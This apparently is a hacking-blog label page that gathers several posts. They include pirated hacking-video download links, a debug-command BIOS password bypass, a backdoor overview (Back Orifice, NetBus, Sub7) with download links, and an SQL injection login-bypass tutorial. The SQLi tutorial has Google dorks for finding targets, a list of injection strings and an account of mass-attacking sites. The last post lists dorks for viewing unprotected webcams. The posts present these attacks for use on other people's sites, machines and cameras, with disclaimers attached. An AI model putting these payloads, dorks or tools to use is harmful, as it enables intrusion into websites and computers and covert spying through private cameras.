Showing posts with label Hacking and Cracking. Show all posts
Showing posts with label Hacking and Cracking. Show all posts

Hacking Tutorial Videos Collection

Hacking Tutorial Videos Collection

Hacking Tutorial Videos Collection

English | Subtitle: English | 3 Hours | 1024 x 768, 680 x 460 | SWF + AVI | MP3 - 128kbps | 663 MB
Genre: Tutorial


Video List:

128 Bit Wep Cracking With Injection!
A Penetration Attack Reconstructed
A Quick and Dirty Intro to Nessus using the Auditor Boot CD!
Adding Modules to a Slax or Backtrack Live CD from Windows
Airplay replay attack - no wireless client required
Anonym.OS LiveCD with build in Tor Onion routing and Privoxy
BackTrack LiveCD to HD Installation Instruction Video
Basic Nmap Usage!
Basic Tools for Wardriving!
Bluesnarfer attack tool demonstration
Bluesnarfing a Nokia 6310i hand set
Breaking WEP in 10 minutes
Cain to ARP poison and sniff passwords!
Complete Hacking Video using Metasploit - Meterpreter
Cracking a 128 bit WEP key (Auditor)
Cracking a 128 Bit Wep key + entering the cridentials
Cracking Syskey and the SAM on Windows Using Samdump2 and John!
Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text!
Cracking WPA Networks (Auditor)
DoS attack against Windows FTP Server - DoS
Droop s Box Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools!
Exploiting some bugs of tools used in Windows
Exploiting weaknesses of PPTP VPN (Auditor)
Finding Rogue SMB File Shares On Your Network!
Fun with Ettercap Filters!
How to crack the local windows passwords in the SAM database
How to decrypt SSL encrypted traffic using a man in the middle attack (Auditor)
How to sniff around switches using Arpspoof and Ngrep!
Install VNC Remotely!
Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Hi-Res)
Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Lo-Res)
John The Ripper 1.7 password cracker Installation Instruction Video
Local Password Cracking Presentation for the Indiana Higher Education Cybersecurity Summit 2005!
MAC Bridging with Windows XP and Sniffing!
Mass De-Authentication using void11 (Auditor)
Metasploit Flash Tutorial!
MITM Hijacking
Nmap Video Tutorial 2 Port Scan Boogaloo!
Sniffing logins and passwords
Sniffing Remote Router Traffic via GRE Tunnels (Hi-Res)
Sniffing Remote Router Traffic via GRE Tunnels (Lo-Res)
Sniffing VoIP Using Cain!
Snort Instruction video - howto install into backtrack
SSH Dynamic Port Forwarding!
Start a session and get interactive commandline access to a remote Windows box!
Telnet Bruteforce
Tunneling Exploits through SSH
Use Brutus to crack a box running telnet!
Using NetworkActiv to sniff webpages on a Wi-Fi network!
WEP Cracking using Aireplay v2.2 Beta 7 (Whax 3.0)
WMF File Code Execution Vulnerability With Metasploit!
WPA Cracking using Aireplay v2.2 Beta 7 (Whax 3.0)

Hacking Tutorial Videos Collection



Download From Hotfile



Download From Fileserve



Link Are Interchangable. It Means You Can Download Any Part Form Any Server (1 Part Fileserve , 1 Part Filesonic , 1 Part Hotfile , ...) And Later Extract It . No Problem At All
Thanks For Download . Best Wishes For You ^^!

Here is the Best way to Crack the BIOS password

There are a lot ways to Crack the BIOS password. This is one of them but I would say that this one is more effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS.
Follow the steps below:
[eminimall]
1) Boot up windows.
2) go to dos-prompt or go to command prompt directly from the windows start up menu.
3) type the command at the prompt: “debug” (without quotes ninja.gif )
4) type the following lines now exactly as given…….
o 70 10
o 71 20
quit
exit
4) exit from the dos prompt and restart the machine
password protection gone!!!!!!!!!!!!!
EnjoYYYYYYYYYY
PS: I tested this in Award Bios……..
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine………..
I have not found any other trouble if the codes are used.
To be on safe side, just back up your data……….
The use of this code is entirely at ur risk……….
It worked fine for me……….

Three Most used Backdoor Programs

There is a general misconception about security today. Most people would love to believe that their firewalls are completely capable to protect them from anything indecent. The sad part, they could not be more wrong. Hungry Hacker aim to prove it with three separate programs that can compromise the security of computers. You have the opportunity to say “What’s a backdoor?” Yes, these programs were created in 1990, but still pose a real threat today. It is the first two that are still being developed.
Using these programs any noob can remotely access your computer without any Authentication and do whatever he wants. I will tell you some of the features rest of them you need to try it and find out. These Programs :
  • Work as a key logger.
  • Send any Information from Victim’s PC to the Hacker’s PC.
  • Run any program on the Victims PC.
  • Display any Violating Image on victim’s Screen.
  • Open the CD Drive of the Victim’s PC.
  • Open any Web page on the Victims Screen.
  • Disable any Specific Key or whole Keyboard.
  • Shutdown Victim’s PC.
  • Start a Song on the Victim’s PC.etc.etc…………..
Back Orifice / Back Orifice 2000
Back Orifice is one of the most common backdoor programs, and one of the most deadly. The name may seem like a joke, but sure, the threat is real. Back Orifice was established in Cult of the Dead Cow group. Back Orifice is an Open Source Program. The main Threat of this software is that by making some changes in the code anybody can make it undetectable to the Anti virus Program running on the Victim’s computer. Apart from the strange title, the program usually gets port 31337, the reference to “Lit” phenomenon is popular among hackers.
Back Orifice uses a client-server model, while the server and client is the victim attacker. What makes Back Orifice so dangerous that it can install and operate silently. There is not required interaction with the user in, meaning you could its on your computer right now, and do not know.
Companies such as Symantec have taken steps to protect computers against programs that they consider dangerous. But even more attacks using Back Orifice 2000. This is due partly to the fact that it is still evolving, as open source. As stated in the documentation the goal is ultimately the presence of the Back Orifice 2000 unknown even to those who installed it.
Back Orifice 2000, developed for Windows 95, Windows 98, Windows NT, Windows 2000 and Windows XP.
Where can I download Back orifice 2000?
Back Orifice 2000 can be downloaded at the following address: http://sourceforge.net/projects/bo2k/
I infected! How do I remove it?
Removing Back Orifice 2000 may require that you change the registry settings. To remove it at 7 simple steps, refer to the diagram below.
How do I delete Back orifice 2000
  1. Click Start> Run, and type “Regedit”(without the quotes)
  2. Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices “
  3. Now looking in the right box: “The umgr32 = ‘c: \ windows \ system \ umgr32.exe”
  4. Right-click on this entry and click Remove. Now restart your computer.
  5. After restarting only open Windows Explorer. Make sure you can see all registered extensions. To do so, select “View Options and configure the appropriate settings.
  6. Go to the WINDOWS \ SYSTEM directory, and find “umgr32.exe” file. Once you find it, delete it.
  7. Exit Windows Explorer and reboot again.
NetBus / Netbus 2.0 Pro
NetBus was established around the same time that the Back Orifice was in the late 1990′s. NetBus was originally designed as a program prank friends and family, of course anything too malicious. However, the program was released in 1998, and is widely used as a backdoor to manage computer.
Like the Back Orifice, NetBus allows attackers to do virtually everything in the computer victim. It also works well under Windows 9x systems, as well as Windows XP. Unlike Back Orifice, the latest version of NetBus regarded shareware is not free. NetBus is also implementing less stealthy operations, as a direct result of criticism and complaints of abusive use.
Where can I buy and download NetBus?
NetBus can be purchased and downloaded at the following address: http://www.netbus.org/
Ok, I am infected. Now what?
Fortunately, the latest version of NetBus is a valid program. It can be removed just like any other program. Previous issuance NetBus is a bit more tricky, however. If you are not lucky enough attacked with the latest version, the withdrawal process and in the Back Orifice.
How do I remove NetBus?
  1. Click Start> Run, and type “Regedit ‘(without the quotes)
  2. Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices “
  3. Now, in the right box, looking as follows: “[Name_of_Server].”Exe Of course, you have to find the actual name of this file EXE-. Usually This” Patch.exe ‘or’ SysEdit.exe “, but may vary.
  4. Reboot and remove all traces of the actual program, which can be left. Additionally, you can set yourself NetBus, and then use its own function disposal.
SubSeven / Sub7
SubSeven or Sub7, has been established for the same purpose was to NetBus pranks. Sub7 actually has more support for pranks, and has more advanced users. Sub7 also widely used by the script kiddies, although that many firewalls and anti-virus software before initialization.
Since Sub7 not supported for several years, the threat is usually very low. Most security programs will not have any problem in ending Sub7 before it has a chance to be started. This shows that the importance to the modernization and security programs is critical, because the money was still there.
Nevertheless, it is widely used by those who have physical access to your firewall, or security programs. If access rights, the tool will work without restrictions.
Where can I buy and download Sub7?
Sub7 not supported more, and hence is not available for download on any legitimate websites. If you were to make a Google search, you would find links to download Sub7. However, this is not the official site, and should be considered dubious and dangerous.
Sounds harmless, How do I remove it?
  1. End of the following processes through the curator: “editserver.exe, subseven.exe”
  2. Delete the following files: “editserver.exe, subseven.exe, tutorial.txt.”
Why these programs is absolutely legitimate?
All the basis behind these programs is that they are designed to help people, not harm. While some like NetBus really were originally created for pranks, they switched routes to avoid legal problems.
These programs claim to be the legitimate remote desktop program, although they certainly easily used for malicious use. These programs really should be used to aid or customer support departments. Why all adolescents is to copy these programs goes beyond us, but leave the content of their networks, while computer is a good idea.
The advent of new technology has made these programs in some respects less effective. However, programs such as Back Orifice 2000, yet still evolving, so do not be surprised to learn that he works in the background, waiting for instructions. Since the best defense is a good offense, be sure to save a sharp eye on what is installed on the network computers. After all, an ounce of prevention is worth a pound of cure.

SQL injection Basic Tutorial

One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work

SEARCH:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question


WHAT I DO :

first let me go into details on how i go about my research

i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder

INJECTION STRINGS:HOW ?

this is the easiest part...very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:' or 1=1--

or

user:' or 1=1--
admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used

there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper

the one am interested in are quick access to targets

PROGRAM

i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??

combo example:

admin:' or a=a--
admin:' or 1=1--

and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string

now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search

17,000 possible targets trying various searches spews out plent more


now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me

i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...

sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs

am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as login process


(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

happy hunting


*******************************************

WARNING: the information provided is for educationally purposes only and not to be used for malicious use. i hold no responsibility
for your actions...do the right thing and let admins know ay

How To Gain Access To Unprotected Webcams Using Google

 in this article I will show you how to use a simple Google Dork to access unprotected webcams online.There are thousands of unprotected webcams available online, Since many Webcams use known protocols to transmit live video streams over the web, it's often very easy to search for publicly accessible webcams
1.First of all open your Internet browser and visit Google.com

2.Search on Google for the following Keyword "inurl:/view.index.shtml"





3. Next Choose a webcam and Enjoy

Google Dorks

Here is the list of Few Google Dorks used for this purpose:


inurl:/view.shtml
intitle:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210″
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1″ intext:”Open Menu”
intext:”MOBOTIX M10″ intext:”Open Menu”
intext:”MOBOTIX D10″ intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1″
intitle:”sony network camera snc-m1″
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console - Web Monitor”

Note:This article is for educational Purposes only.


Find any key or serial of any software

This summary is not available. Please click here to view the post.

powered by Blogger | WordPress by Newwpthemes | Converted by BloggerTheme